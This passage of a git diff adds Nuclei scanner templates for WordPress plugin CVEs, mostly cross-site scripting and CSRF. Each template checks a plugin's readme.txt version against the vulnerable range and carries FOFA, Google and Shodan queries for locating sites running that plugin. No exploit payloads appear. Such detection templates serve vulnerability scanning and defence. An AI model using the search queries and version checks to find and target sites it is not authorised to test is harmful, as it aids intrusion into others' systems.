+ - 200 + + - type: word + words: + - "wp-parsidate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867.yaml b/poc/cve/CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867.yaml new file mode 100644 index 0000000000..b9373d77b3 --- /dev/null +++ b/poc/cve/CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867 + +info: + name: > + Support SVG – Upload svg files in wordpress without hassle <= 1.1.0 - Authenticated (Author+) Stored Cross-site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Support SVG – Upload svg files in wordpress without hassle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9207baf-348c-4d3b-a6f0-cbfcd2624f78?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11091 + metadata: + fofa-query: "wp-content/plugins/support-svg/" + google-query: inurl:"/wp-content/plugins/support-svg/" + shodan-query: 'vuln:CVE-2024-11091' + tags: cve,wordpress,wp-plugin,support-svg,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/support-svg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "support-svg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml b/poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml new file mode 100644 index 0000000000..285f4876ec --- /dev/null +++ b/poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9 + +info: + name: > + BNE Gallery Extended <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via gallery Shortcode + author: topscoder + severity: low + description: > + The BNE Gallery Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gallery' shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1f9277d8-ac81-4950-a1e5-4e6c6b042f84?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11119 + metadata: + fofa-query: "wp-content/plugins/bne-gallery-extended/" + google-query: inurl:"/wp-content/plugins/bne-gallery-extended/" + shodan-query: 'vuln:CVE-2024-11119' + tags: cve,wordpress,wp-plugin,bne-gallery-extended,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bne-gallery-extended/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bne-gallery-extended" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml b/poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml new file mode 100644 index 0000000000..0bc99c792d --- /dev/null +++ b/poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9 + +info: + name: > + Spotify Play Button for WordPress <= 2.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via spotifyplaybutton Shortcode + author: topscoder + severity: low + description: > + The Spotify Play Button for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's spotifyplaybutton shortcode in all versions up to, and including, 2.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a52e43dd-46b4-445b-b350-a2fd76315869?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11192 + metadata: + fofa-query: "wp-content/plugins/spotify-play-button-for-wordpress/" + google-query: inurl:"/wp-content/plugins/spotify-play-button-for-wordpress/" + shodan-query: 'vuln:CVE-2024-11192' + tags: cve,wordpress,wp-plugin,spotify-play-button-for-wordpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/spotify-play-button-for-wordpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "spotify-play-button-for-wordpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.11') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml b/poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml new file mode 100644 index 0000000000..2f155351ae --- /dev/null +++ b/poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11202-32578cc7038a4c251703cadebc084ad8 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11202 + metadata: + fofa-query: "wp-content/plugins/cm-email-blacklist/" + google-query: inurl:"/wp-content/plugins/cm-email-blacklist/" + shodan-query: 'vuln:CVE-2024-11202' + tags: cve,wordpress,wp-plugin,cm-email-blacklist,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-email-blacklist/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-email-blacklist" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml b/poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml new file mode 100644 index 0000000000..d819ed817c --- /dev/null +++ b/poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11202-52e2ce4340581c57296ec17159d2460d + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11202 + metadata: + fofa-query: "wp-content/plugins/cm-video-lesson-manager/" + google-query: inurl:"/wp-content/plugins/cm-video-lesson-manager/" + shodan-query: 'vuln:CVE-2024-11202' + tags: cve,wordpress,wp-plugin,cm-video-lesson-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-video-lesson-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-video-lesson-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml b/poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml new file mode 100644 index 0000000000..3ef68e0ec9 --- /dev/null +++ b/poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11202-77caff140b8bc5be998ac80c9386051c + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11202 + metadata: + fofa-query: "wp-content/plugins/enhanced-tooltipglossary/" + google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary/" + shodan-query: 'vuln:CVE-2024-11202' + tags: cve,wordpress,wp-plugin,enhanced-tooltipglossary,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "enhanced-tooltipglossary" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.3.11') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml b/poc/cve/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml new file mode 100644 index 0000000000..ea5f97b40d --- /dev/null +++ b/poc/cve/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11202 + metadata: + fofa-query: "wp-content/plugins/cm-business-directory/" + google-query: inurl:"/wp-content/plugins/cm-business-directory/" + shodan-query: 'vuln:CVE-2024-11202' + tags: cve,wordpress,wp-plugin,cm-business-directory,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-business-directory/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-business-directory" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14.yaml b/poc/cve/CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14.yaml new file mode 100644 index 0000000000..4672417259 --- /dev/null +++ b/poc/cve/CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11202 + metadata: + fofa-query: "wp-content/plugins/cm-pop-up-banners/" + google-query: inurl:"/wp-content/plugins/cm-pop-up-banners/" + shodan-query: 'vuln:CVE-2024-11202' + tags: cve,wordpress,wp-plugin,cm-pop-up-banners,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-pop-up-banners/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-pop-up-banners" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml b/poc/cve/CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml new file mode 100644 index 0000000000..3e7b09a29a --- /dev/null +++ b/poc/cve/CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11202 + metadata: + fofa-query: "wp-content/plugins/cm-on-demand-search-and-replace/" + google-query: inurl:"/wp-content/plugins/cm-on-demand-search-and-replace/" + shodan-query: 'vuln:CVE-2024-11202' + tags: cve,wordpress,wp-plugin,cm-on-demand-search-and-replace,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-on-demand-search-and-replace/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-on-demand-search-and-replace" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml b/poc/cve/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml new file mode 100644 index 0000000000..0bd5c16918 --- /dev/null +++ b/poc/cve/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11202 + metadata: + fofa-query: "wp-content/plugins/cm-header-footer-script-loader/" + google-query: inurl:"/wp-content/plugins/cm-header-footer-script-loader/" + shodan-query: 'vuln:CVE-2024-11202' + tags: cve,wordpress,wp-plugin,cm-header-footer-script-loader,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-header-footer-script-loader/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-header-footer-script-loader" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml b/poc/cve/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml new file mode 100644 index 0000000000..59c5e3bdd8 --- /dev/null +++ b/poc/cve/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512 + +info: + name: > + Premium Packages – Sell Digital Products Securely <= 5.9.3 - Reflected Cross-Site Scripting via add_query_arg + author: topscoder + severity: medium + description: > + The Premium Packages – Sell Digital Products Securely plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.9.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e847fd-0932-4d65-a201-b86e39a33588?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11225 + metadata: + fofa-query: "wp-content/plugins/wpdm-premium-packages/" + google-query: inurl:"/wp-content/plugins/wpdm-premium-packages/" + shodan-query: 'vuln:CVE-2024-11225' + tags: cve,wordpress,wp-plugin,wpdm-premium-packages,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpdm-premium-packages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpdm-premium-packages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.9.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml b/poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml new file mode 100644 index 0000000000..650c93ff82 --- /dev/null +++ b/poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da + +info: + name: > + Skt NURCaptcha <= 3.5.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Skt NURCaptcha plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.5.0. This is due to missing or incorrect nonce validation in the skt-nurc-admin.php file. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/96e47918-7848-407a-8f77-dbbfeb17029d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11342 + metadata: + fofa-query: "wp-content/plugins/skt-nurcaptcha/" + google-query: inurl:"/wp-content/plugins/skt-nurcaptcha/" + shodan-query: 'vuln:CVE-2024-11342' + tags: cve,wordpress,wp-plugin,skt-nurcaptcha,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/skt-nurcaptcha/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "skt-nurcaptcha" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml b/poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml new file mode 100644 index 0000000000..f855a87c8d --- /dev/null +++ b/poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc + +info: + name: > + WIP Incoming Lite <= 1.1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WIP Incoming Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the save_option() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc949922-7bfa-4704-9038-cf4b5262f864?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11416 + metadata: + fofa-query: "wp-content/plugins/wip-incoming-lite/" + google-query: inurl:"/wp-content/plugins/wip-incoming-lite/" + shodan-query: 'vuln:CVE-2024-11416' + tags: cve,wordpress,wp-plugin,wip-incoming-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wip-incoming-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wip-incoming-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml b/poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml new file mode 100644 index 0000000000..a531e42776 --- /dev/null +++ b/poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3 + +info: + name: > + Additional Order Filters for WooCommerce <= 1.21 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Additional Order Filters for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shipping_method_filter' parameter in all versions up to, and including, 1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d59ea96f-ad02-4189-8155-7de7de5556ba?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11418 + metadata: + fofa-query: "wp-content/plugins/additional-order-filters-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/additional-order-filters-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-11418' + tags: cve,wordpress,wp-plugin,additional-order-filters-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/additional-order-filters-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "additional-order-filters-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.21') \ No newline at end of file diff --git a/poc/cve/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml b/poc/cve/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml new file mode 100644 index 0000000000..9ee712546d --- /dev/null +++ b/poc/cve/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41 + +info: + name: > + Constant Contact Forms by MailMunch <= 2.0.11 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Constant Contact Forms by MailMunch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 2.0.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a84bd9c8-97bd-4572-8bfa-5191d98c9523?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-22137 + metadata: + fofa-query: "wp-content/plugins/constant-contact-forms-by-mailmunch/" + google-query: inurl:"/wp-content/plugins/constant-contact-forms-by-mailmunch/" + shodan-query: 'vuln:CVE-2024-22137' + tags: cve,wordpress,wp-plugin,constant-contact-forms-by-mailmunch,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/constant-contact-forms-by-mailmunch/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + 